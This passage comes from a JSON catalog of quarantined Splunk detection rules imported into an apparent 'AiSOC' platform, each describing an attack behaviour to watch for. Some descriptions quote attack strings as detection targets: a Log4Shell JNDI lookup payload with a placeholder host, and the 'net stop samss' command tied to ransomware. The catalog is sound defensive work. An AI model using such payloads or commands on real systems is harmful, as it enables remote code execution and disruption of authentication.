"2026-05-04", "upstream_path": "detections/endpoint/windows_rdpclient_connection_sequence_events.yml" } }, { "id": "splunk-security-content-676b600a-a94d-4951-b346-11329431e6c1", "type": "detection", "name": "GetDomainController with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-DomainController` commandlet using PowerShell Script Block Logging (EventCode=4104). This commandlet is part of PowerView, a tool often used for domain enumeration. The detection leverages script block text to identify this specific activity. Monitoring this behavior is crucial as it may indicate an adversary or Red Team performing reconnaissance to map out domain controllers. If confirmed malicious, this activity could lead to further domain enumeration, potentially exposing sensitive information and aiding in lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1018" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getdomaincontroller-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "676b600a-a94d-4951-b346-11329431e6c1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getdomaincontroller_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-67740bd3-1506-469c-b91d-effc322cc6e5", "type": "detection", "name": "GetWmiObject Ds Group with PowerShell Script Block", "description": "The following analytic detects the execution of the `Get-WmiObject` commandlet with the `DS_Group` parameter via PowerShell Script Block Logging (EventCode=4104). This method leverages WMI to query all domain groups. Monitoring this activity is crucial as adversaries and Red Teams may use it for domain group enumeration, aiding in situational awareness and Active Directory discovery. If confirmed malicious, this activity could allow attackers to map out the domain structure, potentially leading to further exploitation and privilege escalation within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/getwmiobject-ds-group-with-powershell-script-block.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67740bd3-1506-469c-b91d-effc322cc6e5", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/getwmiobject_ds_group_with_powershell_script_block.yml" } }, { "id": "splunk-security-content-67bd3def-c41c-4bf6-837b-ae196b4257c6", "type": "detection", "name": "Detect AWS Console Login by User from New Country", "description": "The following analytic identifies AWS console login events by users from a new country. It leverages AWS CloudTrail events and compares them against a lookup file of previously seen users and their login locations. This activity is significant because logins from new countries can indicate potential unauthorized access or compromised accounts. If confirmed malicious, this could lead to unauthorized access to AWS resources, data exfiltration, or further exploitation within the AWS environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1535", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-aws-console-login-by-user-from-new-country.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67bd3def-c41c-4bf6-837b-ae196b4257c6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/detect_aws_console_login_by_user_from_new_country.yml" } }, { "id": "splunk-security-content-67d2a52e-a7e2-4a5d-ae44-a21212048bc2", "type": "detection", "name": "Windows Process Commandline Discovery", "description": "The following analytic detects the use of Windows Management Instrumentation Command-line (WMIC) to retrieve information about running processes, specifically targeting the command lines used to launch those processes. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on logs containing process details and command-line executions. This activity is significant as it may indicate suspicious behavior, such as a user or process gathering detailed process information, which is uncommon for non-technical users. If confirmed malicious, this could allow an attacker to gain insights into running processes, aiding in further exploitation or lateral movement.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1057" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-commandline-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67d2a52e-a7e2-4a5d-ae44-a21212048bc2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_commandline_discovery.yml" } }, { "id": "splunk-security-content-67d4dbef-9564-4699-8da8-03a151529edc", "type": "detection", "name": "Create Remote Thread into LSASS", "description": "The following analytic detects the creation of a remote thread in the Local Security Authority Subsystem Service (LSASS). This behavior is identified using Sysmon EventID 8 logs, focusing on processes that create remote threads in lsass.exe. This activity is significant because it is commonly associated with credential dumping, a tactic used by adversaries to steal user authentication credentials. If confirmed malicious, this could allow attackers to gain unauthorized access to sensitive information, leading to potential compromise of the entire network. Analysts should investigate to differentiate between legitimate tools and potential threats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/create-remote-thread-into-lsass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "67d4dbef-9564-4699-8da8-03a151529edc", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/create_remote_thread_into_lsass.yml" } }, { "id": "splunk-security-content-683e6196-b8e8-11eb-9a79-acde48001122", "type": "detection", "name": "Detect Renamed PSExec", "description": "The following analytic identifies instances where `PsExec.exe` has been renamed and executed on an endpoint. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and original file names. This activity is significant because renaming `PsExec.exe` is a common tactic to evade detection. If confirmed malicious, this could allow an attacker to execute commands remotely, potentially leading to unauthorized access, lateral movement, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1569.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-renamed-psexec.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "683e6196-b8e8-11eb-9a79-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_renamed_psexec.yml" } }, { "id": "splunk-security-content-683f48de-982f-4a7e-9aac-9cec550da498", "type": "detection", "name": "Windows Alternate DataStream - Base64 Content", "description": "The following analytic detects the creation of Alternate Data Streams (ADS) with Base64 content on Windows systems. It leverages Sysmon EventID 15, which captures file creation events, including the content of named streams. ADS can conceal malicious payloads, making them significant for SOC monitoring. This detection identifies hidden streams that may contain executables, scripts, or configuration data, often used by malware to evade detection. If confirmed malicious, this activity could allow attackers to hide and execute payloads, persist in the environment, or access sensitive information without being easily detected.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1564.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-alternate-datastream-base64-content.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "683f48de-982f-4a7e-9aac-9cec550da498", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_alternate_datastream___base64_content.yml" } }, { "id": "splunk-security-content-68469fd0-1315-44ba-b7e4-e92847bb76d6", "type": "detection", "name": "O365 New Email Forwarding Rule Created", "description": "The following analytic identifies the creation of new email forwarding rules in an Office 365 environment. It detects events logged under New-InboxRule and Set-InboxRule operations within the o365_management_activity data source, focusing on parameters like ForwardTo, ForwardAsAttachmentTo, and RedirectTo. This activity is significant as unauthorized email forwarding can lead to data exfiltration and unauthorized access to sensitive information. If confirmed malicious, attackers could intercept and redirect emails, potentially compromising confidential communications and leading to data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1114.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-new-email-forwarding-rule-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68469fd0-1315-44ba-b7e4-e92847bb76d6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_new_email_forwarding_rule_created.yml" } }, { "id": "splunk-security-content-6860a62c-9203-11eb-9e05-acde48001122", "type": "detection", "name": "Disabling Firewall with Netsh", "description": "The following analytic identifies the disabling of the firewall using the netsh application. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions that include keywords like \"firewall,\" \"off,\" or \"disable.\" This activity is significant because disabling the firewall can expose the system to external threats, allowing malware to communicate with its command and control (C2) server. If confirmed malicious, this action could lead to unauthorized data exfiltration, further malware downloads, and broader network compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/disabling-firewall-with-netsh.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6860a62c-9203-11eb-9e05-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/disabling_firewall_with_netsh.yml" } }, { "id": "splunk-security-content-68a0056c-34cb-455f-b03d-df935ea62c4f", "type": "detection", "name": "Network Traffic to Active Directory Web Services Protocol", "description": "The following analytic identifies network traffic directed to the Active Directory Web Services Protocol (ADWS) on port 9389. It leverages network traffic logs, focusing on source and destination IP addresses, application names, and destination ports. This activity is significant as ADWS is used to manage Active Directory, and unauthorized access could indicate malicious intent. If confirmed malicious, an attacker could manipulate Active Directory, potentially leading to privilege escalation, unauthorized access, or persistent control over the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1069.001", "T1069.002", "T1087.001", "T1087.002", "T1482" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/network-traffic-to-active-directory-web-services-protocol.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68a0056c-34cb-455f-b03d-df935ea62c4f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/network_traffic_to_active_directory_web_services_protocol.yml" } }, { "id": "splunk-security-content-68cbc9e9-2882-46f2-b636-3b5080589d58", "type": "detection", "name": "Windows BitLockerToGo Process Execution", "description": "The following analytic detects BitLockerToGo.exe execution, which has been observed being abused by Lumma stealer malware. The malware leverages this legitimate Windows utility to manipulate registry keys, search for cryptocurrency wallets and credentials, and exfiltrate sensitive data. This activity is significant because BitLockerToGo.exe provides functionality for viewing, copying, and writing files as well as modifying registry branches - capabilities that the Lumma stealer exploits. However, note that if legitimate use of BitLockerToGo.exe is in the organization, this detection will", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-bitlockertogo-process-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68cbc9e9-2882-46f2-b636-3b5080589d58", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_bitlockertogo_process_execution.yml" } }, { "id": "splunk-security-content-68d3e2c1-e97f-4310-b080-dea180b48aa9", "type": "detection", "name": "Zscaler Phishing Activity Threat Blocked", "description": "The following analytic identifies potential phishing attempts blocked by Zscaler within a network. It leverages web proxy logs to detect actions tagged as HTML.Phish. The detection method involves analyzing critical data points such as user, threat name, URL, and hostname. This activity is significant for a SOC as it serves as an early warning system for phishing threats, enabling prompt investigation and mitigation. If confirmed malicious, this activity could indicate an attempt to deceive users into divulging sensitive information, potentially leading to data breaches or credential theft.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/zscaler-phishing-activity-threat-blocked.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68d3e2c1-e97f-4310-b080-dea180b48aa9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/zscaler_phishing_activity_threat_blocked.yml" } }, { "id": "splunk-security-content-68fe4efa-bbbb-44ee-9f09-d07d2f0f346b", "type": "detection", "name": "ESXi SSH Brute Force", "description": "This detection identifies signs of SSH brute-force attacks by monitoring for a high number of failed login attempts within a short time frame. Such activity may indicate an attacker attempting to gain unauthorized access through password guessing.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/esxi-ssh-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "68fe4efa-bbbb-44ee-9f09-d07d2f0f346b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/esxi_ssh_brute_force.yml" } }, { "id": "splunk-security-content-69078d8c-0de6-45de-bb00-14e78e042fd6", "type": "detection", "name": "GitHub Organizations Disable Dependabot", "description": "The following analytic detects when a user disables Dependabot security features within a GitHub repository. Dependabot helps automatically identify and fix security vulnerabilities in dependencies. The detection monitors GitHub Enterprise logs for configuration changes that disable Dependabot functionality. This behavior could indicate an attacker attempting to prevent the automatic detection of vulnerable dependencies, which would allow them to exploit known vulnerabilities that would otherwise be patched. For a SOC, identifying the disabling of security features like Dependabot is critical as it may be a precursor to supply chain attacks where attackers exploit vulnerable dependencies. The impact could be severe if vulnerabilities remain unpatched, potentially leading to code execution, data theft, or other compromises through the software supply chain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001", "T1195" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/github-organizations-disable-dependabot.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69078d8c-0de6-45de-bb00-14e78e042fd6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/github_organizations_disable_dependabot.yml" } }, { "id": "splunk-security-content-69201633-30d9-48ef-b1b6-e680805f0582", "type": "detection", "name": "Windows Admon Group Policy Object Created", "description": "The following analytic detects the creation of a new Group Policy Object (GPO) using Splunk's Admon data. It identifies events where a new GPO is created, excluding default \"New Group Policy Object\" entries. Monitoring GPO creation is crucial as adversaries can exploit GPOs to escalate privileges or deploy malware across an Active Directory network. If confirmed malicious, this activity could allow attackers to control system configurations, deploy ransomware, or propagate malware, significantly compromising the network's security.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-admon-group-policy-object-created.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69201633-30d9-48ef-b1b6-e680805f0582", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_admon_group_policy_object_created.yml" } }, { "id": "splunk-security-content-692226f1-84e3-4f63-a747-d53e65699608", "type": "detection", "name": "Windows Default RDP File Creation By Non MSTSC Process", "description": "This detection monitors the creation or modification of the Default.rdp file by non mstsc.exe process, typically found in the user's Documents folder. This file is automatically generated or updated by the Remote Desktop Connection client (mstsc.exe) when a user initiates an RDP session. It stores connection settings such as the last-used hostname, screen size, and other preferences. The presence or update of this file strongly suggests that an RDP session has been launched from the system. Since this file is commonly overlooked, it can serve as a valuable artifact in identifying remote access activity, including potential lateral movement or attacker-controlled sessions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-default-rdp-file-creation-by-non-mstsc-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "692226f1-84e3-4f63-a747-d53e65699608", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_default_rdp_file_creation_by_non_mstsc_process.yml" } }, { "id": "splunk-security-content-6923cd64-17a0-453c-b945-81ac2d8c6db9", "type": "detection", "name": "Protocols passing authentication in cleartext", "description": "The following analytic identifies the use of cleartext protocols that risk leaking sensitive information. It detects network traffic on legacy protocols such as Telnet (port 23), POP3 (port 110), IMAP (port 143), and non-anonymous FTP (port 21). The detection leverages the Network_Traffic data model to identify TCP traffic on these ports. Monitoring this activity is crucial as it can expose credentials and other sensitive data to interception. If confirmed malicious, attackers could capture authentication details, leading to unauthorized access and potential data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/protocols-passing-authentication-in-cleartext.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6923cd64-17a0-453c-b945-81ac2d8c6db9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/protocols_passing_authentication_in_cleartext.yml" } }, { "id": "splunk-security-content-6947c44e-be1f-4dd9-b198-bc42be5be196", "type": "detection", "name": "Windows Modify Registry ValleyRat PWN Reg Entry", "description": "The following analytic detects modifications to the Windows Registry specifically targeting `.pwn` file associations related to the ValleyRAT malware. ValleyRAT may create or alter registry entries to associate `.pwn` files with malicious processes, allowing it to execute harmful scripts or commands when these files are opened. By monitoring for unusual changes in registry keys linked to `.pwn` extensions, this detection enables security analysts to identify potential ValleyRAT infection attempts. Early detection of these modifications helps mitigate unauthorized execution and prevents further exploitation of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-valleyrat-pwn-reg-entry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "6947c44e-be1f-4dd9-b198-bc42be5be196", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_valleyrat_pwn_reg_entry.yml" } }, { "id": "splunk-security-content-695aceae-21db-4e7f-93ac-a52e39d02b93", "type": "detection", "name": "Adobe ColdFusion Unauthenticated Arbitrary File Read", "description": "The following analytic detects potential exploitation of the Adobe ColdFusion vulnerability, CVE-2023-26360, which allows unauthenticated arbitrary file read.\nIt monitors POST requests to the \"/cf_scripts/scripts/ajax/ckeditor/*\" endpoint using the Web datamodel.\nThis activity can be significant due to the vulnerability's high CVSS score of 9.8, indicating severe risk.\nIf confirmed malicious, it could lead to unauthorized data access, further attacks, or severe operational disruptions.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/adobe-coldfusion-unauthenticated-arbitrary-file-read.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "695aceae-21db-4e7f-93ac-a52e39d02b93", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/adobe_coldfusion_unauthenticated_arbitrary_file_read.yml" } }, { "id": "splunk-security-content-696694df-5706-495a-81f2-79501fa11b90", "type": "detection", "name": "SSL Certificates with Punycode", "description": "The following analytic detects SSL certificates with Punycode domains in the SSL issuer email domain, identified by the prefix \"xn--\". It leverages the Certificates Datamodel to flag these domains and uses CyberChef for decoding. This activity is significant as Punycode can be used for domain spoofing and phishing attacks. If confirmed malicious, attackers could deceive users and systems, potentially leading to unauthorized access and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1573" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/ssl-certificates-with-punycode.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "696694df-5706-495a-81f2-79501fa11b90", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/ssl_certificates_with_punycode.yml" } }, { "id": "splunk-security-content-697eb4c0-1008-4c3c-b5ae-7bd9b39adbd6", "type": "detection", "name": "Windows ComputerDefaults Spawning a Process", "description": "The following analytic detects the spawning of ComputerDefaults.exe, a Windows system process used to manage default application associations. While normally legitimate, this process can be exploited by attackers to bypass User Account Control (UAC) and execute unauthorized code with elevated privileges. Detection focuses on abnormal execution patterns, unusual parent-child process relationships, or deviations from standard paths. Such behavior may indicate attempts to modify system defaults or run malicious scripts undetected. Monitoring ComputerDefaults.exe is critical to identify potential security threats, prevent privilege escalation, and maintain system integrity by distinguishing normal operations from suspicious activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-computerdefaults-spawning-a-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "697eb4c0-1008-4c3c-b5ae-7bd9b39adbd6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_computerdefaults_spawning_a_process.yml" } }, { "id": "splunk-security-content-69934363-e1dd-4c49-8651-9d7663dd4d2f", "type": "detection", "name": "Windows Account Discovery for Sam Account Name", "description": "The following analytic detects the execution of the PowerView PowerShell cmdlet Get-NetUser, specifically querying for \"samaccountname\" and \"pwdlastset\" attributes. It leverages Event ID 4104 from PowerShell Script Block Logging to identify this activity. This behavior is significant as it may indicate an attempt to gather user account information from Active Directory, which is a common reconnaissance step in lateral movement or privilege escalation attacks. If confirmed malicious, this activity could allow an attacker to map out user accounts, potentially leading to further exploitation and unauthorized access within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-account-discovery-for-sam-account-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69934363-e1dd-4c49-8651-9d7663dd4d2f", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_account_discovery_for_sam_account_name.yml" } }, { "id": "splunk-security-content-69afee44-5c91-11ec-bf1f-497c9a704a72", "type": "detection", "name": "Log4Shell JNDI Payload Injection with Outbound Connection", "description": "The following analytic detects Log4Shell JNDI payload injections via outbound connections. It identifies suspicious LDAP lookup functions in web logs, such as `${jndi:ldap://PAYLOAD_INJECTED}`, and correlates them with network traffic to known malicious IP addresses. This detection leverages the Web and Network_Traffic data models in Splunk. Monitoring this activity is crucial as it targets vulnerabilities in Java web applications using log4j, potentially leading to remote code execution. If confirmed malicious, attackers could gain unauthorized access, execute arbitrary code, and compromise sensitive data within the affected environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1190", "T1133" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/log4shell-jndi-payload-injection-with-outbound-connection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69afee44-5c91-11ec-bf1f-497c9a704a72", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/web/log4shell_jndi_payload_injection_with_outbound_connection.yml" } }, { "id": "splunk-security-content-69c12d59-d951-431e-ab77-ec426b8d65e6", "type": "detection", "name": "Windows Security Account Manager Stopped", "description": "The following analytic detects the stopping of the Windows Security Account Manager (SAM) service via command-line, typically using the \"net stop samss\" command. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant because stopping the SAM service can disrupt authentication mechanisms and is often associated with ransomware attacks like Ryuk. If confirmed malicious, this action could lead to unauthorized access, privilege escalation, and potential system-wide compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1489" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-security-account-manager-stopped.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "69c12d59-d951-431e-ab77-ec426b8d65e6", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_security_account_manager_stopped.yml" } }, { "id": "splunk-security-content-69df7f7c-155d-11ec-a055-acde48001122", "type": "detection", "name": "Get WMIObject Group Discovery with Script Block Logging", "description": "The following analytic detects the execution of the `Get-WMIObject Win32_Group` command using PowerShell Script Block Logging (EventCode=4104). This method captures the full command sent to PowerShell, allowing for detailed 